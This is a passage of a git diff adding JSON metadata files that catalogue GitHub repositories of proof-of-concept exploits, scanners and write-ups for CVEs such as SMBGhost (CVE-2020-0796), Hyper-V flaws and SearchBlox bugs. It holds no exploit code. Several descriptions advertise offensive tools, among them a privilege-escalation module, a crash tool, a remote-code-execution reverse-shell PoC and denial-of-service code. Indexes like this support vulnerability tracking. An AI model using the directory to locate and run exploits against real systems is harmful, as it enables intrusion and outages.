"watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 273582266, + "name": "SMBGhost-LPE-Metasploit-Module", + "full_name": "Almorabea\/SMBGhost-LPE-Metasploit-Module", + "owner": { + "login": "Almorabea", + "id": 13198863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4", + "html_url": "https:\/\/github.com\/Almorabea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Almorabea\/SMBGhost-LPE-Metasploit-Module", + "description": "This is an implementation of the CVE-2020-0796 aka SMBGhost vulnerability, compatible with the Metasploit Framework", + "fork": false, + "created_at": "2020-06-19T20:38:11Z", + "updated_at": "2024-07-16T02:27:52Z", + "pushed_at": "2020-06-19T20:58:36Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 277568818, + "name": "SMBGhost-SMBleed-scanner", + "full_name": "jamf\/SMBGhost-SMBleed-scanner", + "owner": { + "login": "jamf", + "id": 1423569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1423569?v=4", + "html_url": "https:\/\/github.com\/jamf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamf\/SMBGhost-SMBleed-scanner", + "description": "SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner", + "fork": false, + "created_at": "2020-07-06T14:45:07Z", + "updated_at": "2024-08-12T20:03:26Z", + "pushed_at": "2020-07-06T19:00:06Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "cve-2020-1206", + "smbghost", + "smbleed" + ], + "visibility": "public", + "forks": 16, + "watchers": 46, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 296190446, + "name": "CVE-2020-0796-BOF", + "full_name": "rsmudge\/CVE-2020-0796-BOF", + "owner": { + "login": "rsmudge", + "id": 1174994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1174994?v=4", + "html_url": "https:\/\/github.com\/rsmudge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rsmudge\/CVE-2020-0796-BOF", + "description": null, + "fork": false, + "created_at": "2020-09-17T01:48:37Z", + "updated_at": "2024-08-12T20:05:51Z", + "pushed_at": "2020-09-17T01:55:48Z", + "stargazers_count": 68, + "watchers_count": 68, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 68, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 299197060, + "name": "SMBGhost-CVE-2020-0796-", + "full_name": "codewithpradhan\/SMBGhost-CVE-2020-0796-", + "owner": { + "login": "codewithpradhan", + "id": 68530116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68530116?v=4", + "html_url": "https:\/\/github.com\/codewithpradhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codewithpradhan\/SMBGhost-CVE-2020-0796-", + "description": "To crash Windows-10 easily", + "fork": false, + "created_at": "2020-09-28T05:23:20Z", + "updated_at": "2023-07-30T23:14:58Z", + "pushed_at": "2020-09-28T05:24:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 310486564, + "name": "CVE-2020-0796-POC", + "full_name": "AaronCaiii\/CVE-2020-0796-POC", + "owner": { + "login": "AaronCaiii", + "id": 40255963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40255963?v=4", + "html_url": "https:\/\/github.com\/AaronCaiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AaronCaiii\/CVE-2020-0796-POC", + "description": "CVE-2020-0796-POC", + "fork": false, + "created_at": "2020-11-06T03:56:52Z", + "updated_at": "2020-11-06T05:27:47Z", + "pushed_at": "2020-11-06T05:27:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 311524122, + "name": "CVE-2020-0796", + "full_name": "datntsec\/CVE-2020-0796", + "owner": { + "login": "datntsec", + "id": 70559607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70559607?v=4", + "html_url": "https:\/\/github.com\/datntsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datntsec\/CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-11-10T02:35:34Z", + "updated_at": "2023-03-28T18:22:13Z", + "pushed_at": "2020-12-25T09:08:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 314499390, + "name": "LPE---CVE-2020-0796", + "full_name": "MasterSploit\/LPE---CVE-2020-0796", + "owner": { + "login": "MasterSploit", + "id": 74764997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74764997?v=4", + "html_url": "https:\/\/github.com\/MasterSploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterSploit\/LPE---CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2020-11-20T09:00:08Z", + "updated_at": "2022-02-08T17:19:05Z", + "pushed_at": "2020-11-20T13:47:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 385839527, + "name": "CVE-2020-0796-Scanner", + "full_name": "1stPeak\/CVE-2020-0796-Scanner", + "owner": { + "login": "1stPeak", + "id": 46148989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46148989?v=4", + "html_url": "https:\/\/github.com\/1stPeak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1stPeak\/CVE-2020-0796-Scanner", + "description": null, + "fork": false, + "created_at": "2021-07-14T06:38:05Z", + "updated_at": "2022-02-14T02:17:42Z", + "pushed_at": "2021-07-14T06:42:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 403086776, + "name": "SMBGhost_CVE-2020-0796_checker", + "full_name": "Anonimo501\/SMBGhost_CVE-2020-0796_checker", + "owner": { + "login": "Anonimo501", + "id": 67207446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67207446?v=4", + "html_url": "https:\/\/github.com\/Anonimo501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anonimo501\/SMBGhost_CVE-2020-0796_checker", + "description": null, + "fork": false, + "created_at": "2021-09-04T15:07:15Z", + "updated_at": "2021-09-12T02:41:33Z", + "pushed_at": "2021-09-04T15:08:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413598798, + "name": "cve-2020-0796", + "full_name": "Opensitoo\/cve-2020-0796", + "owner": { + "login": "Opensitoo", + "id": 91356804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91356804?v=4", + "html_url": "https:\/\/github.com\/Opensitoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Opensitoo\/cve-2020-0796", + "description": null, + "fork": false, + "created_at": "2021-10-04T22:16:37Z", + "updated_at": "2021-10-04T22:17:11Z", + "pushed_at": "2023-08-18T04:11:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415205467, + "name": "CVE-2020-0796", + "full_name": "orangmuda\/CVE-2020-0796", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2020-0796", + "description": "Remote Code Execution POC for CVE-2020-0796", + "fork": false, + "created_at": "2021-10-09T04:52:55Z", + "updated_at": "2024-08-12T20:17:08Z", + "pushed_at": "2021-11-01T19:36:41Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0796", + "exploitation", + "remote-command-execution" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415247594, + "name": "CVE-2020-0796-LPE-POC", + "full_name": "Murasame-nc\/CVE-2020-0796-LPE-POC", + "owner": { + "login": "Murasame-nc", + "id": 55078755, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55078755?v=4", + "html_url": "https:\/\/github.com\/Murasame-nc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Murasame-nc\/CVE-2020-0796-LPE-POC", + "description": null, + "fork": false, + "created_at": "2021-10-09T08:19:55Z", + "updated_at": "2021-10-09T08:24:27Z", + "pushed_at": "2021-10-09T08:24:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422054053, + "name": "CVE-2020-0796-Batch-scanning", + "full_name": "F6JO\/CVE-2020-0796-Batch-scanning", + "owner": { + "login": "F6JO", + "id": 64877810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64877810?v=4", + "html_url": "https:\/\/github.com\/F6JO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/F6JO\/CVE-2020-0796-Batch-scanning", + "description": "批量扫描CVE-2020-0796", + "fork": false, + "created_at": "2021-10-28T03:39:03Z", + "updated_at": "2021-10-30T07:16:16Z", + "pushed_at": "2021-10-28T03:46:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431719232, + "name": "CVE-2020-0796-exp", + "full_name": "lisinan988\/CVE-2020-0796-exp", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2020-0796-exp", + "description": null, + "fork": false, + "created_at": "2021-11-25T04:59:48Z", + "updated_at": "2021-11-26T12:36:25Z", + "pushed_at": "2021-11-26T12:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474851127, + "name": "ECE9069_SMBGhost_Exploit_CVE-2020-0796-", + "full_name": "vsai94\/ECE9069_SMBGhost_Exploit_CVE-2020-0796-", + "owner": { + "login": "vsai94", + "id": 101088695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101088695?v=4", + "html_url": "https:\/\/github.com\/vsai94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vsai94\/ECE9069_SMBGhost_Exploit_CVE-2020-0796-", + "description": "Description of Exploit SMBGhost CVE-2020-0796 ", + "fork": false, + "created_at": "2022-03-28T04:58:17Z", + "updated_at": "2022-03-28T04:58:17Z", + "pushed_at": "2022-03-28T07:13:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500936134, + "name": "CVE-2020-0796", + "full_name": "arzuozkan\/CVE-2020-0796", + "owner": { + "login": "arzuozkan", + "id": 48025290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48025290?v=4", + "html_url": "https:\/\/github.com\/arzuozkan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arzuozkan\/CVE-2020-0796", + "description": "CVE-2020-0796 explanation and researching vulnerability for term porject CENG325", + "fork": false, + "created_at": "2022-06-07T17:16:16Z", + "updated_at": "2022-08-02T13:00:06Z", + "pushed_at": "2022-06-07T17:39:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563860053, + "name": "CVE-2020-0796", + "full_name": "SEHandler\/CVE-2020-0796", + "owner": { + "login": "SEHandler", + "id": 117070298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117070298?v=4", + "html_url": "https:\/\/github.com\/SEHandler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SEHandler\/CVE-2020-0796", + "description": "CVE-2020-0796", + "fork": false, + "created_at": "2022-11-09T13:46:24Z", + "updated_at": "2022-11-10T03:05:05Z", + "pushed_at": "2022-11-10T04:10:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578453150, + "name": "CVE-2020-0796", + "full_name": "TweatherQ\/CVE-2020-0796", + "owner": { + "login": "TweatherQ", + "id": 83338640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83338640?v=4", + "html_url": "https:\/\/github.com\/TweatherQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TweatherQ\/CVE-2020-0796", + "description": "CVE-2020-0796-利用工具", + "fork": false, + "created_at": "2022-12-15T04:55:56Z", + "updated_at": "2022-12-15T04:55:56Z", + "pushed_at": "2022-12-15T04:55:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594612197, + "name": "CVE-2020-0796", + "full_name": "krizzz07\/CVE-2020-0796", + "owner": { + "login": "krizzz07", + "id": 84465507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84465507?v=4", + "html_url": "https:\/\/github.com\/krizzz07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krizzz07\/CVE-2020-0796", + "description": "windows 10 SMB vulnerability", + "fork": false, + "created_at": "2023-01-29T04:29:49Z", + "updated_at": "2023-01-29T04:29:49Z", + "pushed_at": "2023-01-29T04:29:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607429591, + "name": "cve-2020-0796", + "full_name": "OldDream666\/cve-2020-0796", + "owner": { + "login": "OldDream666", + "id": 89271654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89271654?v=4", + "html_url": "https:\/\/github.com\/OldDream666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OldDream666\/cve-2020-0796", + "description": "cve-2020-0796利用工具集", + "fork": false, + "created_at": "2023-02-28T00:27:37Z", + "updated_at": "2024-05-29T08:01:19Z", + "pushed_at": "2023-06-04T23:18:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646702161, + "name": "CVE-2020-0796", + "full_name": "Ajomix\/CVE-2020-0796", + "owner": { + "login": "Ajomix", + "id": 57254763, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57254763?v=4", + "html_url": "https:\/\/github.com\/Ajomix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ajomix\/CVE-2020-0796", + "description": "WindowsProtocolTestSuites is to trigger BSoD, and full exploit poc.", + "fork": false, + "created_at": "2023-05-29T06:31:51Z", + "updated_at": "2023-06-27T02:20:56Z", + "pushed_at": "2023-05-29T06:37:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762178646, + "name": "POC-CVE-2020-0796", + "full_name": "hungdnvp\/POC-CVE-2020-0796", + "owner": { + "login": "hungdnvp", + "id": 84326257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84326257?v=4", + "html_url": "https:\/\/github.com\/hungdnvp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hungdnvp\/POC-CVE-2020-0796", + "description": null, + "fork": false, + "created_at": "2024-02-23T08:41:29Z", + "updated_at": "2024-02-23T08:41:30Z", + "pushed_at": "2024-02-23T09:06:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767077239, + "name": "smbGhostCVE-2020-0796", + "full_name": "AdamSonov\/smbGhostCVE-2020-0796", + "owner": { + "login": "AdamSonov", + "id": 96952084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96952084?v=4", + "html_url": "https:\/\/github.com\/AdamSonov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdamSonov\/smbGhostCVE-2020-0796", + "description": "This script will help you to scan for smbGhost vulnerability(CVE-2020-0796)", + "fork": false, + "created_at": "2024-03-04T16:59:53Z", + "updated_at": "2024-06-22T19:24:50Z", + "pushed_at": "2024-03-04T18:05:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841220966, + "name": "Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities", + "full_name": "z3ena\/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities", + "owner": { + "login": "z3ena", + "id": 164459555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164459555?v=4", + "html_url": "https:\/\/github.com\/z3ena", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3ena\/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities", + "description": "This repository contains detailed documentation and code related to the exploitation, detection, and mitigation of two significant vulnerabilities: CVE-2020-0796 (SMBGhost) and Print Spooler.", + "fork": false, + "created_at": "2024-08-12T00:40:41Z", + "updated_at": "2024-08-12T00:43:42Z", + "pushed_at": "2024-08-12T00:43:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0887.json b/2020/CVE-2020-0887.json new file mode 100644 index 0000000000..01c1b9ea64 --- /dev/null +++ b/2020/CVE-2020-0887.json @@ -0,0 +1,33 @@ +[ + { + "id": 371005825, + "name": "CVE-2020-0887", + "full_name": "vinhthp1712\/CVE-2020-0887", + "owner": { + "login": "vinhthp1712", + "id": 56665422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56665422?v=4", + "html_url": "https:\/\/github.com\/vinhthp1712", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinhthp1712\/CVE-2020-0887", + "description": null, + "fork": false, + "created_at": "2021-05-26T11:14:13Z", + "updated_at": "2022-09-16T16:04:27Z", + "pushed_at": "2021-07-12T08:47:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0890.json b/2020/CVE-2020-0890.json new file mode 100644 index 0000000000..57adce7ea6 --- /dev/null +++ b/2020/CVE-2020-0890.json @@ -0,0 +1,95 @@ +[ + { + "id": 292597950, + "name": "hyperv_local_dos_poc", + "full_name": "gerhart01\/hyperv_local_dos_poc", + "owner": { + "login": "gerhart01", + "id": 25981258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25981258?v=4", + "html_url": "https:\/\/github.com\/gerhart01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerhart01\/hyperv_local_dos_poc", + "description": "CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code", + "fork": false, + "created_at": "2020-09-03T14:45:51Z", + "updated_at": "2024-03-31T12:19:38Z", + "pushed_at": "2020-09-08T20:01:05Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 471740268, + "name": "gerhart01", + "full_name": "skasanagottu57gmailv\/gerhart01", + "owner": { + "login": "skasanagottu57gmailv", + "id": 101940293, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101940293?v=4", + "html_url": "https:\/\/github.com\/skasanagottu57gmailv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skasanagottu57gmailv\/gerhart01", + "description": "CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code", + "fork": false, + "created_at": "2022-03-19T15:47:10Z", + "updated_at": "2022-03-19T15:47:10Z", + "pushed_at": "2022-03-19T15:47:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 488880736, + "name": "gerhart01", + "full_name": "MarcelloTinocor\/gerhart01", + "owner": { + "login": "MarcelloTinocor", + "id": 104972928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104972928?v=4", + "html_url": "https:\/\/github.com\/MarcelloTinocor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarcelloTinocor\/gerhart01", + "description": "CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code", + "fork": false, + "created_at": "2022-05-05T07:56:13Z", + "updated_at": "2022-05-05T07:56:13Z", + "pushed_at": "2022-05-05T07:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0910.json b/2020/CVE-2020-0910.json new file mode 100644 index 0000000000..cd0574d0c1 --- /dev/null +++ b/2020/CVE-2020-0910.json @@ -0,0 +1,33 @@ +[ + { + "id": 339823743, + "name": "CVE-2020-0910", + "full_name": "kfmgang\/CVE-2020-0910", + "owner": { + "login": "kfmgang", + "id": 20864985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20864985?v=4", + "html_url": "https:\/\/github.com\/kfmgang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kfmgang\/CVE-2020-0910", + "description": "Exploit PoC RCE - Windows Hyper-V Remote Code Execution Reverse Shell", + "fork": false, + "created_at": "2021-02-17T18:50:02Z", + "updated_at": "2022-11-03T01:08:49Z", + "pushed_at": "2020-04-22T01:10:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0976.json b/2020/CVE-2020-0976.json new file mode 100644 index 0000000000..b8061c2c9b --- /dev/null +++ b/2020/CVE-2020-0976.json @@ -0,0 +1,33 @@ +[ + { + "id": 247235721, + "name": "GUI-Check-CVE-2020-0976", + "full_name": "ericzhong2010\/GUI-Check-CVE-2020-0976", + "owner": { + "login": "ericzhong2010", + "id": 21117794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21117794?v=4", + "html_url": "https:\/\/github.com\/ericzhong2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ericzhong2010\/GUI-Check-CVE-2020-0976", + "description": null, + "fork": false, + "created_at": "2020-03-14T07:59:28Z", + "updated_at": "2024-08-12T19:58:47Z", + "pushed_at": "2020-06-04T12:22:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10128.json b/2020/CVE-2020-10128.json new file mode 100644 index 0000000000..6d4b610495 --- /dev/null +++ b/2020/CVE-2020-10128.json @@ -0,0 +1,33 @@ +[ + { + "id": 677312611, + "name": "CVE-2020-10128", + "full_name": "InfoSec4Fun\/CVE-2020-10128", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-10128", + "description": "CVE-2020-10128 - SearchBlox product before V-9.2.1 is vulnerable to Stored-Cross Site Scripting", + "fork": false, + "created_at": "2023-08-11T08:59:35Z", + "updated_at": "2023-08-11T09:47:05Z", + "pushed_at": "2023-08-11T09:40:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10129.json b/2020/CVE-2020-10129.json new file mode 100644 index 0000000000..094a5352fa --- /dev/null +++ b/2020/CVE-2020-10129.json @@ -0,0 +1,33 @@ +[ + { + "id": 677319048, + "name": "CVE-2020-10129", + "full_name": "InfoSec4Fun\/CVE-2020-10129", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-10129", + "description": "CVE-2020-10129 - SearchBlox product before V-9.2 is vulnerable to Privileged Escalation-Lower user is able to access Admin", + "fork": false, + "created_at": "2023-08-11T09:18:50Z", + "updated_at": "2023-08-11T09:48:05Z", + "pushed_at": "2023-08-11T09:25:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10130.json b/2020/CVE-2020-10130.json new file mode 100644 index 0000000000..c3bd6eb46f --- /dev/null +++ b/2020/CVE-2020-10130.json @@ -0,0 +1,33 @@ +[ + { + "id": 677321720, + "name": "CVE-2020-10130", + "full_name": "InfoSec4Fun\/CVE-2020-10130", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + 